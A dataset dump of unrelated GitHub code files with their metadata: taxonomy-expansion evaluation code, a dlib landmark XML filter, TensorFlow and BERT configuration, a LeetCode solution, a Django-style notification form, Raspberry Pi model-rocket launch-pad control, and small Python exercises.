write_json('../data_train_test_path/path_cnt_%s.json'%(dataset), num_of_paths)\r\n write_json('../log_result/rank_test_%d_%s.json'%(epoch, args.model_name), rank_save)\r\n write_json('../log_result/score_test_%d_%s.json'%(epoch, args.model_name), score_test_save)\r\n write_json('../log_result/score_%d_%s.json'%(epoch, args.model_name), score_save)\r\n write_json('../log_result/path_test_%d_%s.json'%(epoch, args.model_name), path_save)\r\n import time\r\n with open('../log_result/%s.txt'%(args.model_name), 'a+') as f:\r\n f.write('Time: %s @ Mean Rank:%.2f/%d, Acc: %.4f, Acc@3:%.4f Acc@5:%.4f mrr:%.4f wup:%.4f '%(time.ctime(), np.mean(rank), l, float(correct/total_rank),acc3,acc5,mrr,wup_score))\r\n f.write('\\n')\r\n print('@ Mean Rank:%.2f/%d, Acc: %.4f, Acc@3:%.4f Acc@5:%.4f mrr:%.4f wup:%.4f '%( np.mean(rank), l, float(correct/total_rank),acc3,acc5,mrr,wup_score))\r\n print('=> Testing: Mean Rank:%.2f/%d, Acc = %.3f'%(np.mean(rank), l, float(correct/total_rank)))\r\n # score_one={}(given item, output score), score_pred={}(given item, output all scores)\r\n '''\r\n attach the node in the test set and design new paths\r\n ## this case consider all nodes / this setting is not considered in evaluation part --> we only consider leaf nodes \r\n '''\r\n correct = 0\r\n ranks = []\r\n wums = []\r\n item_, attach_ = select_node_to_attach(score_best) #Item: term in the test, attach_: term in the taxo \r\n item_, attach_ = int(item_), int(attach_)\r\n total += 1\r\n tmp_rank = 1\r\n if attach_pos_gold[item_] == attach_:\r\n correct += 1\r\n ranks.append(1)\r\n wums.append(1)\r\n else:\r\n gold_position =attach_pos_gold[item_]\r\n if gold_position in score_one[str(item_)]:\r\n for term in score_one[str(item_)]:\r\n if score_one[str(item_)][term] > score_one[str(item_)][gold_position]:\r\n tmp_rank += 1\r\n ranks.append(tmp_rank)\r\n wums.append(wum[gold_position, attach_])\r\n\r\n print('attach %d to %d, gold %d'%( int(item_), int(attach_), int(attach_pos_gold[item_])) )\r\n '''\r\n update the score one by one\r\n '''\r\n taxo_test.parent[item_] = attach_\r\n attach_term_list.append(item_)\r\n\r\n attach_path = []\r\n node = item_\r\n for _ in range(args.path_len):\r\n attach_path.append(node)\r\n if node not in taxo_test.parent:\r\n break\r\n node = taxo_test.parent[node]\r\n to_attached_number -= 1\r\n while to_attached_number > 0:\r\n if len(attach_path) == args.path_len:\r\n target_path = [[x] for x in attach_path]\r\n inner_path = []\r\n for _ in range(args.path_len-1):\r\n inner_path.extend(get_path_from_terms(target_path[_], target_path[_+1], inv_paths_index))\r\n #train_path = \r\n pos_term = attach_path\r\n for t in test_hyn:\r\n if t in attach_term_list:\r\n continue\r\n score_t = {}\r\n \ttest_node = int(t)\r\n train_path = get_path_from_attach_terms(t, target_path, args.path_len, inv_paths_index, synonym)\r\n if innerpath:\r\n inner = []\r\n freq = []\r\n for z in inner_path:\r\n inner.extend(dep_path[z[0]][\"path\"])\r\n freq.extend(dep_path[z[0]][\"freq\"])\r\n #print(inner,freq)\r\n if len(inner) > 100:\r\n sample_idx, sample_freq = random_choice(freq, max_val= 100)\r\n inner = [inner[x] for x in sample_idx]\r\n freq = sample_freq\r\n else:\r\n inner = []\r\n freq = []\r\n dependency_paths = []\r\n dependency_freq = []\r\n for y in train_path:\r\n if y == None:\r\n dependency_paths.append([])\r\n dependency_freq.append([])\r\n elif len(dep_path[y[0]][\"path\"])>100: # sample 50 paths if there is too much dependency path\r\n sample_idx, sample_freq = random_choice(dep_path[y[0]][\"freq\"], max_val= 100)\r\n #print(dep_path[xx][\"path\"], dep_path[xx][\"freq\"], sample_idx, sample_freq)\r\n dependency_paths.append([dep_path[y[0]][\"path\"][x] for x in sample_idx])\r\n dependency_freq.append(sample_freq)\r\n else:\r\n dependency_paths.append(dep_path[y[0]][\"path\"])\r\n dependency_freq.append(dep_path[y[0]][\"freq\"])\r\n score, embed_preds, paths_preds, taxi_preds = models(target_path = target_path, inner_path = inner, inner_freq = freq, attach = test_node, \\\r\n attach_path = dependency_paths, attach_freq = dependency_freq, device = device, compound = compound)\r\n if args.encode_prop == 'attn':\r\n s=np.around(attn.astype(np.float64), decimals=2)\r\n #print(list([list(x) for x in s[1]]))\r\n if is_softmax:\r\n score = F.softmax(score, dim = 1)\r\n score = score.detach().cpu().numpy().reshape(-1)\r\n for e,s in zip(pos_term, score):\r\n if e not in score_t:\r\n score_t[e] = [s]\r\n else:\r\n score_t[e].append(s)\r\n for attach_item in score_t:\r\n if attach_item in score_pred[t]:\r\n score_pred[t][attach_item].extend(score_t[attach_item])\r\n else:\r\n score_pred[t][attach_item] = score_t[attach_item]\r\n if metric =='mean':\r\n score_one[t][attach_item] = scipy.stats.gmean(score_pred[t][attach_item]) if is_softmax else np.mean(score_pred[t][attach_item])\r\n else:\r\n score_one[t][attach_item] = np.max(score_pred[t][attach_item])\r\n\r\n best_val, best_attach = get_max_from_dict(score_one[t]) # attach: is the node in original taxo\r\n #score_one[t] = one_score\r\n score_best[t] = {'best_val': best_val, 'attach': best_attach} # t: term in test set\r\n item_, attach_ = select_node_to_attach(score_best, attach_term_list) #Item: term in the test, attach_: term in the taxo \r\n item_, attach_ = int(item_), int(attach_)\r\n total += 1\r\n tmp_rank = 1\r\n if attach_pos_gold[item_] == attach_:\r\n correct += 1\r\n wums.append(1)\r\n ranks.append(1)\r\n else:\r\n gold_position = attach_pos_gold[item_]\r\n #print([gold_position], score_one[str(item_)].keys() )\r\n if gold_position in score_one[str(item_)]:\r\n for term in score_one[str(item_)]:\r\n if score_one[str(item_)][term] > score_one[str(item_)][gold_position]:\r\n tmp_rank += 1\r\n ranks.append(tmp_rank)\r\n wums.append(wum[gold_position, attach_])\r\n taxo_test.parent[item_] = attach_\r\n attach_term_list.append(item_)\r\n\r\n attach_path = []\r\n node = item_\r\n for _ in range(args.path_len):\r\n attach_path.append(node)\r\n if node not in taxo_test.parent:\r\n break\r\n node = taxo_test.parent[node]\r\n #print(item_,attach_, attach_pos_gold[item_])\r\n #print('attach %d to %d, gold %d'%( int(item_), int(attach_), int(attach_pos_gold[item_])) )\r\n if (int(item_), int(attach_)) in inv_paths_index:\r\n dep_num1 = len(dep_path[inv_paths_index[(int(item_), int(attach_))]][\"path\"])\r\n else:\r\n dep_num1 = 0\r\n if (int(item_), int(attach_pos_gold[item_]) ) in inv_paths_index:\r\n dep_num2 = len(dep_path[inv_paths_index[(int(item_), int(attach_pos_gold[item_]))]][\"path\"])\r\n else:\r\n dep_num2 = 0\r\n to_attached_number -= 1\r\n\r\n #write_json('../log_result/%s_%s_%s_%d_score.json'%(args.model_name, args.encode_dep, args.encode_prop, epoch), score_)\r\n if synonym:\r\n pass\r\n #print(ranks,wums)\r\n mrr = np.mean([1/x for x in ranks])\r\n acc3 = getacc(ranks, 3)\r\n acc5 = getacc(ranks, 5)\r\n print('=> Testing: Mean Rank:%d/%d, Acc = %.4f, Acc@3 = %.4f, Acc@5 = %.4f, wum = %.4f, mrr = %.4f'%(correct, total, float(correct/len(ranks)), acc3,acc5,np.mean(wums), mrr))\r\n\r\ndef getacc(rank, k):\r\n return len([x for x in rank if x<=k])/len(rank)\r\ndef get_max_from_dict(one_score):\r\n best_val = -10000\r\n best_attach = -10000\r\n for z in one_score:\r\n if one_score[z] > best_val:\r\n best_val = one_score[z]\r\n best_attach = z\r\n return best_val, best_attach\r\n\r\ndef select_node_to_attach(score_best, attached = []):\r\n best_val = -10000\r\n best_attach = -100000\r\n best_item = -10000\r\n for item in score_best:\r\n if int(item) not in attached:\r\n if score_best[item][\"best_val\"] > best_val:\r\n best_val = score_best[item][\"best_val\"]\r\n best_attach = score_best[item][\"attach\"]\r\n best_item = item\r\n else:\r\n pass\r\n #print(item, attached)\r\n return best_item, best_attach\r\n\r\ndef get_path_from_terms_with_synonym(src, tgt, inv_paths_index):\r\n paths = []\r\n for s in src:\r\n for t in tgt:\r\n if (s,t) in inv_paths_index:\r\n paths.append(inv_paths_index[(s,t)])\r\n return paths\r\n\r\ndef get_path_from_attach_terms(attach, original, length, inv_paths_index, synonym):\r\n #attach: a number\r\n #original: a \r\n path = []\r\n if synonym:\r\n for o in original:\r\n if (attach, o[0]) in inv_paths_index:\r\n path.append([inv_paths_index[(attach, o[0])]])\r\n else:\r\n path.append(None)\r\n else:\r\n for o in original:\r\n path_tmp = []\r\n for x in o:\r\n if (attach, x) in inv_paths_index:\r\n path_tmp.append(inv_paths_index[(attach, o[0])]) \r\n path.append(path_tmp if len(path_tmp)>0 else None)\r\n assert len(path) == length\r\n return path \r\n\r\ndef get_path_from_terms(src, tgt, inv_paths_index):\r\n paths = []\r\n s = src[0]\r\n t = tgt[0]\r\n if (s,t) in inv_paths_index:\r\n paths.append(inv_paths_index[(s,t)])\r\n return paths ","repo_name":"yueyu1030/STEAM","sub_path":"model/test_fuse.py","file_name":"test_fuse.py","file_ext":"py","file_size_in_byte":22252,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"16"} +{"seq_id":"72881250568","text":"# Import necessary packages\nimport argparse\nimport re #This module provides regular expression matching operations similar to those found in Perl.\n\n# Construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\n# The script required input and output\nap.add_argument(\"-i\", \"--input\", required=True, help=\"path to iBug 300-W data split XML file\")\nap.add_argument(\"-t\", \"--output\", required=True, help=\"path to output data split XML file\")\n\nargs = vars(ap.parse_args())\n\n# Define the indices of our eye coordinates\nLANDMARKS = set(list(range(36, 48)))\n\n# Define regular expression and load the original XML file:\n# Parsing out eye locations from the XML file:\n# use a regular expression to determine if there's a \"part\"\n# element on any given line\nPART = re.compile(\"part name='[0-9]+'\") # Extracts part elements along with their names/indexes\n\n# Load the contents of the original XML file and open the output file for writing\n\nprint(\"[INFO] parsing data split XML file..\")\nrows = open(args[\"input\"]).read().strip().split(\"\\n\") # Loads content of input XML file\noutput = open(args[\"output\"], \"w\") # Opens output XML file for writing\n\n# Loop over the input XML file to find and extract the eye landmarks:\n\nfor row in rows:\n # Loop over ther rows of the input XML file.\n # Check if the current line has (x, y)-coordinates for the facial landmarks we're interested in\n parts = re.findall(PART, row) # Find all PART in row\n\n # if there's no info related to the coordinates\n # related to facial landmarks, we write to disk \n # with no further modifications\n if len(parts) == 0:\n output.write(\"{}\\n\".format(row))\n\n # Otherwise, there is annotation information we must process\n else: # Parse it further\n # parse out the name of the attribute from the row\n attr = \"name='\"\n i = row.find(attr)\n j = row.find(\"'\", i + len(attr) + 1)\n name = int(row[i + len(attr):j])\n\n # if the facial landmark name exists\n # within the range of our indexes, write to our\n # output file\n if name in LANDMARKS: \n output.write(\"{}\\n\".format(row))\n\n# Close the output file\noutput.close()","repo_name":"brunocamps/eye-detection-dlib","sub_path":"parse_xml.py","file_name":"parse_xml.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4913774586","text":"import six\nimport json\n\nimport tensorflow as tf\n\n\nFLAGS = tf.flags.FLAGS\n\n# Model parameters\ntf.flags.DEFINE_integer(\"hidden_size\", 64, \"Size of LSTM hidden layer.\")\ntf.flags.DEFINE_integer(\"memory_size\", 16, \"The number of memory slots.\")\ntf.flags.DEFINE_integer(\"word_size\", 16, \"The width of each memory slot.\")\ntf.flags.DEFINE_integer(\"num_write_heads\", 1, \"Number of memory write heads.\")\ntf.flags.DEFINE_integer(\"num_read_heads\", 4, \"Number of memory read heads.\")\ntf.flags.DEFINE_integer(\"clip_value\", 20,\n \"Maximum absolute value of controller and dnc outputs.\")\n\n# Optimizer parameters.\ntf.flags.DEFINE_float(\"max_grad_norm\", 50, \"Gradient clipping norm limit.\")\ntf.flags.DEFINE_float(\"learning_rate\", 1e-4, \"Optimizer learning rate.\")\ntf.flags.DEFINE_float(\"optimizer_epsilon\", 1e-10,\n \"Epsilon used for RMSProp optimizer.\")\n\n# Task parameters\ntf.flags.DEFINE_integer(\"batch_size\", 16, \"Batch size for training.\")\ntf.flags.DEFINE_integer(\"num_bits\", 4, \"Dimensionality of each vector to copy\")\ntf.flags.DEFINE_integer(\n \"min_length\", 1,\n \"Lower limit on number of vectors in the observation pattern to copy\")\ntf.flags.DEFINE_integer(\n \"max_length\", 2,\n \"Upper limit on number of vectors in the observation pattern to copy\")\ntf.flags.DEFINE_integer(\"min_repeats\", 1,\n \"Lower limit on number of copy repeats.\")\ntf.flags.DEFINE_integer(\"max_repeats\", 2,\n \"Upper limit on number of copy repeats.\")\n\nhparams = []\n\n\nclass BertConfig(object):\n \"\"\"Configuration for `BertModel`.\"\"\"\n\n def __init__(self,\n vocab_size,\n hidden_size=768,\n num_hidden_layers=12,\n num_attention_heads=12,\n intermediate_size=3072,\n hidden_act=\"gelu\",\n hidden_dropout_prob=0.1,\n attention_probs_dropout_prob=0.1,\n max_position_embeddings=512,\n type_vocab_size=16,\n initializer_range=0.02):\n \"\"\"Constructs BertConfig.\n\n Args:\n vocab_size: Vocabulary size of `inputs_ids` in `BertModel`.\n hidden_size: Size of the encoder layers and the pooler layer.\n num_hidden_layers: Number of hidden layers in the Transformer encoder.\n num_attention_heads: Number of attention heads for each attention layer in\n the Transformer encoder.\n intermediate_size: The size of the \"intermediate\" (i.e., feed-forward)\n layer in the Transformer encoder.\n hidden_act: The non-linear activation function (function or string) in the\n encoder and pooler.\n hidden_dropout_prob: The dropout probability for all fully connected\n layers in the embeddings, encoder, and pooler.\n attention_probs_dropout_prob: The dropout ratio for the attention\n probabilities.\n max_position_embeddings: The maximum sequence length that this model might\n ever be used with. Typically set this to something large just in case\n (e.g., 512 or 1024 or 2048).\n type_vocab_size: The vocabulary size of the `token_type_ids` passed into\n `BertModel`.\n initializer_range: The stdev of the truncated_normal_initializer for\n initializing all weight matrices.\n \"\"\"\n self.vocab_size = vocab_size\n self.hidden_size = hidden_size\n self.num_hidden_layers = num_hidden_layers\n self.num_attention_heads = num_attention_heads\n self.hidden_act = hidden_act\n self.intermediate_size = intermediate_size\n self.hidden_dropout_prob = hidden_dropout_prob\n self.attention_probs_dropout_prob = attention_probs_dropout_prob\n self.max_position_embeddings = max_position_embeddings\n self.type_vocab_size = type_vocab_size\n self.initializer_range = initializer_range\n\n @classmethod\n def from_dict(cls, json_object):\n \"\"\"Constructs a `BertConfig` from a Python dictionary of parameters.\"\"\"\n config = BertConfig(vocab_size=None)\n for (key, value) in six.iteritems(json_object):\n config.__dict__[key] = value\n return config\n\n @classmethod\n def from_json_file(cls, json_file):\n \"\"\"Constructs a `BertConfig` from a json file of parameters.\"\"\"\n with tf.gfile.GFile(json_file, \"r\") as reader:\n text = reader.read()\n return cls.from_dict(json.loads(text))\n\n def to_dict(self):\n \"\"\"Serializes this instance to a Python dictionary.\"\"\"\n output = copy.deepcopy(self.__dict__)\n return output\n\n def to_json_string(self):\n \"\"\"Serializes this instance to a JSON string.\"\"\"\n return json.dumps(self.to_dict(), indent=2, sort_keys=True) + \"\\n\"\n","repo_name":"gaceladri/draft","sub_path":"code/hyperparameters.py","file_name":"hyperparameters.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28274888593","text":"# Use BST property. If both p and q are less than root, recurse on root left, similarly for root right. Else return root.\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n while root:\n if p.val < root.val and q.val < root.val:\n root = root.left\n elif p.val > root.val and q.val > root.val:\n root = root.right\n else:\n return root\n","repo_name":"rohitpatwa/leetcode","sub_path":"235. Lowest Common Ancestor of a Binary Search Tree.py","file_name":"235. Lowest Common Ancestor of a Binary Search Tree.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"7677483272","text":"from onegov.activity import Activity\nfrom onegov.activity import Booking, BookingCollection\nfrom onegov.activity import Occasion, OccasionCollection\nfrom onegov.activity import Period\nfrom onegov.core.orm import as_selectable_from_path\nfrom onegov.core.utils import module_path\nfrom onegov.feriennet import _\nfrom onegov.feriennet.collections import BillingCollection\nfrom onegov.feriennet.layout import DefaultLayout\nfrom onegov.feriennet.models import NotificationTemplate\nfrom onegov.form import Form\nfrom onegov.form.fields import MultiCheckboxField\nfrom onegov.user import User, UserCollection\nfrom sqlalchemy import distinct, or_, func, and_, select, exists\nfrom uuid import uuid4\nfrom wtforms.fields import StringField, TextAreaField, RadioField, SelectField\nfrom wtforms.validators import InputRequired\n\n\nclass NotificationTemplateForm(Form):\n\n subject = StringField(\n label=_(\"Subject\"),\n validators=[InputRequired()]\n )\n\n text = TextAreaField(\n label=_(\"Message\"),\n validators=[InputRequired()],\n render_kw={'rows': 12}\n )\n\n def ensure_not_duplicate_subject(self):\n c = exists().where(NotificationTemplate.subject == self.subject.data)\n\n # in edit mode we must exclude the current model\n if isinstance(self.model, NotificationTemplate):\n c = c.where(NotificationTemplate.id != self.model.id)\n\n if self.request.session.query(c).scalar():\n self.subject.errors.append(\n _(\"A notification with this subject exists already\")\n )\n\n return False\n\n\nclass NotificationTemplateSendForm(Form):\n\n send_to = RadioField(\n label=_(\"Send to (applies to active period only)\"),\n choices=[\n ('myself', _(\n \"Myself\"\n )),\n ('active_organisers', _(\n \"Organisers with an occasion\"\n )),\n ('by_role', _(\n \"Users of a given role\"\n )),\n ('with_wishlist', _(\n \"Users with wishes\"\n )),\n ('with_bookings', _(\n \"Users with bookings\"\n )),\n ('with_unpaid_bills', _(\n \"Users with unpaid bills\"\n )),\n ('by_occasion', _(\n \"Users with attendees of a given occasion\"\n )),\n ],\n default='by_role'\n )\n\n period = SelectField(\n label=_(\"Period\"),\n choices=None,\n depends_on=('send_to', 'with_unpaid_bills'),\n )\n\n roles = MultiCheckboxField(\n label=_(\"Role\"),\n choices=[\n ('admin', _(\"Administrators\")),\n ('editor', _(\"Organisers\")),\n ('member', _(\"Members\"))\n ],\n depends_on=('send_to', 'by_role')\n )\n\n occasion = MultiCheckboxField(\n label=_(\"Occasion\"),\n choices=None,\n depends_on=('send_to', 'by_occasion')\n )\n\n state = MultiCheckboxField(\n label=_(\"Useraccounts\"),\n choices=[\n ('active', _(\"Active users\")),\n ('inactive', _(\"Inactive users\")),\n ],\n default=['active'],\n )\n\n def on_request(self):\n self.populate_occasion()\n self.populate_periods()\n\n @property\n def has_choices(self):\n return self.request.is_admin or bool(self.occasion.choices)\n\n @property\n def recipients(self):\n if self.send_to.data == 'myself':\n return {self.request.current_username}\n\n elif self.send_to.data == 'by_role':\n recipients = self.recipients_by_role(self.roles.data)\n\n elif self.send_to.data == 'by_occasion':\n recipients = self.recipients_by_occasion(self.occasion.data)\n\n elif self.send_to.data == 'with_wishlist':\n recipients = self.recipients_with_wishes()\n\n elif self.send_to.data == 'with_bookings':\n recipients = self.recipients_with_bookings()\n\n elif self.send_to.data == 'active_organisers':\n recipients = self.recipients_which_are_active_organisers()\n\n elif self.send_to.data == 'with_unpaid_bills':\n recipients = self.recipients_with_unpaid_bills()\n\n else:\n raise NotImplementedError\n\n return recipients & self.recipients_pool\n\n @property\n def recipients_pool(self):\n users = UserCollection(self.request.session)\n users = users.query()\n\n if self.state.data == ['active']:\n users = users.filter(User.active == True)\n elif self.state.data == ['inactive']:\n users = users.filter(User.active == False)\n elif self.state.data != ['active', 'inactive']:\n return set()\n\n return {u.username for u in users.with_entities(User.username)}\n\n def recipients_by_role(self, roles):\n if not roles:\n return set()\n\n users = UserCollection(self.request.session)\n\n q = users.by_roles(*roles)\n q = q.filter(User.active == True)\n q = q.with_entities(User.username)\n\n return {u.username for u in q}\n\n def recipients_with_wishes(self):\n bookings = BookingCollection(self.request.session)\n period = self.request.app.active_period\n\n if not period.wishlist_phase:\n return set()\n\n q = bookings.query()\n q = q.join(Period)\n\n q = q.filter(Period.active == True)\n q = q.with_entities(distinct(Booking.username).label('username'))\n\n return {b.username for b in q}\n\n def recipients_with_bookings(self):\n bookings = BookingCollection(self.request.session)\n period = self.request.app.active_period\n\n if period.wishlist_phase:\n return set()\n\n q = bookings.query()\n q = q.join(Period)\n\n q = q.filter(Period.active == True)\n q = q.with_entities(distinct(Booking.username).label('username'))\n\n return {b.username for b in q}\n\n def recipients_which_are_active_organisers(self):\n occasions = OccasionCollection(self.request.session)\n\n q = occasions.query()\n q = q.join(Activity)\n q = q.join(Period)\n q = q.filter(Period.active == True)\n q = q.filter(Occasion.cancelled == False)\n\n q = q.with_entities(distinct(Activity.username).label('username'))\n\n return {o.username for o in q}\n\n def recipients_with_unpaid_bills(self):\n period = next((\n p for p in self.request.app.periods\n if p.id.hex == self.period.data\n ), None) or self.request.app.active_period\n\n billing = BillingCollection(self.request, period=period)\n\n return {\n username for username, bill in billing.bills.items()\n if not bill.paid\n }\n\n def recipients_by_occasion_query(self, occasions):\n bookings = BookingCollection(self.request.session)\n\n q = bookings.query()\n q = q.join(Period)\n q = q.join(Booking.occasion)\n if occasions:\n q = q.filter(Booking.occasion_id.in_(occasions))\n else:\n q = q.filter(Booking.occasion_id == uuid4())\n q = q.filter(or_(\n and_(Occasion.cancelled == False, Booking.state == 'accepted'),\n and_(Occasion.cancelled == True, Booking.state == 'cancelled')\n ))\n q = q.filter(Period.active == True)\n q = q.filter(Period.confirmed == True)\n\n return q\n\n def recipients_by_occasion(self, occasions, include_organisers=True):\n q = self.recipients_by_occasion_query(occasions)\n q = q.with_entities(distinct(Booking.username).label('username'))\n\n attendees = {r.username for r in q}\n\n if not include_organisers:\n return attendees\n\n q = OccasionCollection(self.request.session).query()\n q = q.join(Activity)\n q = q.filter(Occasion.id.in_(occasions))\n q = q.with_entities(distinct(Activity.username).label('username'))\n\n organisers = {r.username for r in q}\n\n return attendees | organisers\n\n def recipients_count_by_occasion(self, occasions):\n q = self.recipients_by_occasion_query(occasions)\n q = q.with_entities(\n Booking.occasion_id,\n func.count(Booking.occasion_id).label('count')\n )\n q = q.group_by(Booking.occasion_id)\n return {r.occasion_id: r.count for r in q}\n\n @property\n def occasion_choices(self):\n if not self.request.app.active_period:\n return\n\n layout = DefaultLayout(self.model, self.request)\n\n stmt = as_selectable_from_path(\n module_path(\n 'onegov.feriennet',\n 'queries/occasion_choices.sql'\n )\n )\n\n query = select(stmt.c).where(\n stmt.c.period_id == self.request.app.active_period.id\n )\n\n templates = {\n True: _(\n \"${title} (cancelled) \"\n \"${dates}, ${count} Attendees\"\n ),\n False: _(\n \"${title} \"\n \"${dates}, ${count} Attendees\"\n )\n }\n\n for record in self.request.session.execute(query):\n template = templates[record.cancelled]\n label = self.request.translate(_(template, mapping={\n 'title': record.title,\n 'count': record.count,\n 'dates': ', '.join(\n layout.format_datetime_range(*d) for d in record.dates\n )\n }))\n\n yield record.occasion_id.hex, label\n\n def populate_periods(self):\n periods = [p for p in self.request.app.periods]\n periods.sort(key=lambda p: not p.active)\n\n self.period.choices = [(p.id.hex, p.title) for p in periods]\n\n def populate_occasion(self):\n self.occasion.choices = list(self.occasion_choices)\n","repo_name":"OneGov/onegov.feriennet","sub_path":"onegov/feriennet/forms/notification_template.py","file_name":"notification_template.py","file_ext":"py","file_size_in_byte":9852,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"14648795907","text":"#Developed and owned by Benjamin Eckert, Peter Gifford, and Ryan Hansen of Western Michigan University.\n\n#pad.py controls the functionality of launch pad objects that are associated\n#with physical rockets\n\nimport RPi.GPIO as GPIO\nimport time\nfrom camera import take_video\nfrom threading import Thread\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\n\nclass Pad:\n #Constructor\n def __init__(self, name, pinIn, pinOut, pinCC):\n self.pinIn = pinIn\n self.pinOut = pinOut\n self.pinCC = pinCC\n self.connected = False\n self.name = name\n\n #Update connection field by checking physical rocket port connection\n def check_connection(self):\n GPIOpin = self.pinIn\n GPIO.setup(GPIOpin, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n state = GPIO.input(GPIOpin)\n if state == False:\n self.connected = True\n else:\n self.connected = False\n\n GPIO.cleanup(GPIOpin)\n\n def launch(self):\n #origional code ---------\n GPIO.setup(self.pinOut,GPIO.OUT)\n GPIO.setup(self.pinCC,GPIO.OUT)\n GPIO.output(self.pinCC,GPIO.HIGH)\n GPIO.output(self.pinOut,GPIO.HIGH)\n GPIO.output(self.pinOut,GPIO.LOW)\n time.sleep(1)\n GPIO.output(self.pinOut,GPIO.HIGH)\n time.sleep(1)\n GPIO.output(self.pinCC,GPIO.LOW)\n \n print(\"Launched \" + self.name)\n\n#Construct a list of pad objects from the pad configuration file\ndef pads_setup():\n #Create empty list and open pad configuration file\n pads = []\n stream = open('/home/pi/RocketLaunch/Source/WebApp/pad.conf', 'r')\n\n #Skip first line, read all lines into a list, initialize index\n next(stream)\n lines = stream.readlines()\n i = 1\n \n #For every line\n for line in lines:\n\n #Get rid of newline at end, split by tab character into a list\n line = line[2:].strip(\"\\n\")\n args = line.split('\\t')\n\n #Create pad object, add to list, iterate index\n pad = Pad('Pad ' + str(i), int(args[0]), int(args[1]), int(args[2]))\n pads.append(pad)\n i = i + 1\n \n #Close the file\n stream.close()\n\n #Return the pad list\n return pads\n","repo_name":"Ryanh627/RocketLaunch","sub_path":"Source/WebApp/pad.py","file_name":"pad.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38739868408","text":"moba_games = {}\nwhile True:\n command = input()\n if command == \"Season end\":\n break\n if \" -> \" in command:\n pps = command.split(\" -> \")\n player, position, skill = pps[0], pps[1], int(pps[2])\n if player not in moba_games:\n moba_games[player] = {position: skill}\n elif position not in moba_games[player]:\n moba_games[player][position] = skill\n else:\n if skill > moba_games[player][position]:\n moba_games[player][position] = skill\n if \" vs \" in command:\n player1, player2 = command.split(\" vs \")\n if player1 in moba_games and player2 in moba_games:\n for position in moba_games[player1]:\n if position in moba_games[player2]:\n player1_total = sum(moba_games[player1].values())\n player2_total = sum(moba_games[player2].values())\n if player1_total > player2_total:\n del moba_games[player2]\n break\n elif player2_total > player1_total:\n del moba_games[player1]\n break\n\nplayers_total = {}\nfor player in moba_games:\n players_total[player] = sum(moba_games[player].values())\nplayers_total = dict(sorted(players_total.items(), key=lambda x: (-x[1], x[0])))\nfor player, total in players_total.items():\n print(f\"{player}: {total} skill\")\n sorted_position = dict(sorted(moba_games[player].items(), key=lambda x: (-x[1], x[0])))\n for key, val in sorted_position.items():\n print(f\"- {key} <::> {val}\")\n","repo_name":"ijestanoff/Judge_Python","sub_path":"python_fundamentals/Dictionaries_More_Exercises/03_moba_challenger.py","file_name":"03_moba_challenger.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25484947215","text":"# 26.Удалить из файла наименьшее нечетное число\r\n# (см. замечание к пре-дыдущей задаче).\r\n\r\nf = open(\"test.txt\", \"wb\")\r\nfor i in range(11, 0, -1):\r\n f.write(i.to_bytes(2, byteorder='big', signed=True))\r\nf.close()\r\n\r\nf2 = open(\"test.txt\", \"rb+\")\r\n\r\nnum = f2.read(2)\r\nmn = 0\r\n\r\nwhile num != b'':\r\n\r\n x = int.from_bytes(num, byteorder='big', signed=True)\r\n if x % 2 != 0:\r\n if not mn:\r\n print('Я тут')\r\n mn = x\r\n ind = f2.tell() - 2\r\n elif x < mn:\r\n print(\"Я поменял\")\r\n mn = x\r\n ind = f2.tell() - 2\r\n\r\n num = f2.read(2)\r\n\r\nf2.seek(-2, 2)\r\nlast_n = f2.read(2)\r\nf2.seek(ind, 0)\r\nf2.write(last_n)\r\nf2.seek(-2, 2)\r\nf2.truncate()\r\nf2.close()","repo_name":"akhachatrian1/Project2k","sub_path":"2 файлы/26 (1).py","file_name":"26 (1).py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3599177149","text":"\ndata=[]\ncount = 0\nwith open('reviews.txt', 'r') as f:\n\tfor line in f:\n\t\tdata.append(line.strip())\n\t\tcount +=1 #count = count + 1\n\t\tif count % 1000 ==0: #如果count除以1000的余数是0\n\t\t\tprint(len(data))\nprint('档案读取完了,总共有', len(data), '笔资料')\n\nprint(data[0])\n\n\n\n\nsum_len=0\nfor d in data:\n\tsum_len = sum_len + len(d) # sum_len是指所有留言长度总和; len(d)是指每个留言长度\nprint('留言平均长度是', sum_len/len(data)) #len(data)是指data的个数\n\n\n#------------------------------\n# 找出留言字数小于100的留言有几笔?\nnew=[]\nfor d in data:\n\tif len(d) < 100:\n\t\tnew.append(d)\nprint('一共有', len(new), '笔留言长度小于100')\nprint(new[0])\nprint(new[1])\n\n\n#------------------------------\n#找出留言内包含good的流言有几笔?\n\ngood=[]\nfor d in data:\n\tif 'good' in d:\n\t\tgood.append(d)\nprint('一共有', len(good), '笔留言')\nprint(good[0])\n\n#------------------------------\n#快写法\ngood= [d for d in data if 'good' in d]\nprint(good)\n\nbad= ['bad' in d for d in data]\nprint(bad)\n\n\n\n\n#文字计数\n\nwc = {} #word_count\nfor d in data:\n\twords = d.split(' ')\n\tfor word in words:\n\t\tif word in wc:\n\t\t\twc[word] +=1\n\telse:\n\t\twc[word] = 1 #新增新的key进wc字典\n\n# print(wc)\n\nfor word in wc:\n\tif wc[word] > 100000: #印出出现次数>100次的字字\n\t\tprint(word, wc[word]) #印出字典的字字 与 